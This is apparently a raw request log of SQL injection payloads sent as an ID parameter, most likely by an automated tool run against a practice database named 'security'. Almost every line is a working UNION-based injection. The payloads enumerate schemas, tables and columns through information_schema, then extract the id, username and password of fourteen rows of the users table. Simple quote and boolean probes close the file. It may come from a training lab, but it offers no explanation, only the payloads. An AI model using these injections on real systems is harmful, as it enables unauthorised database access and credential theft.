ID:999999.9' union all select (select concat(0x7e,0x27,0x7233646D3076335F68766A5F696E6A656374696F6E,0x27,0x7e) limit 0,1),0x31303235343830303536,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,0x7233646D3076335F68766A5F696E6A656374696F6E,0x27,0x7e) limit 0,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 0,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 2,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 4,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 5,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 6,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 7,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 8,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 9,1),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x7365637572697479),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(group_concat(table_name) as char))),0x27,0x7e) from `information_schema`.tables where table_schema=0x7365637572697479),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,count(column_name),0x27,0x7e) from `information_schema`.columns where table_schema=0x7365637572697479 and table_name=0x7573657273),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(group_concat(column_name) as char))),0x27,0x7e) from `information_schema`.columns where table_schema=0x7365637572697479 and table_name=0x7573657273),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,count(*),0x27,0x7e) from `security`.users),0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 0,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 0,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 0,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 1,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 1,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 1,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 2,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 2,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 2,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 3,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 3,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 3,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 4,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 4,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 4,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 5,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 5,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 5,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 6,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 6,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 6,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 7,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 7,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 7,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 8,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 8,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 8,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 9,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 9,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 9,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 10,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 10,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 10,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 11,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 11,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 11,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 12,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 12,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 12,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.id as char))),0x27,0x7e) from `security`.users Order by id limit 13,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.username as char))),0x27,0x7e) from `security`.users Order by id limit 13,1) ,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `security`.users Order by id limit 13,1) ,0x31303235343830303536 and 'x'='x
ID:1
ID:1
ID:1'
ID:1
ID:1'
ID:1
ID:1'
ID:1 and1=1
ID:1 and1=1
ID:1 and1=2
ID:1'
ID:1
ID:1
ID:1'-- 
ID:1
ID:1'
ID:1'
ID:1
ID:1
ID:1'
ID:1'
ID:1
ID:1'
ID:1
ID:1'
ID:1
ID:1'
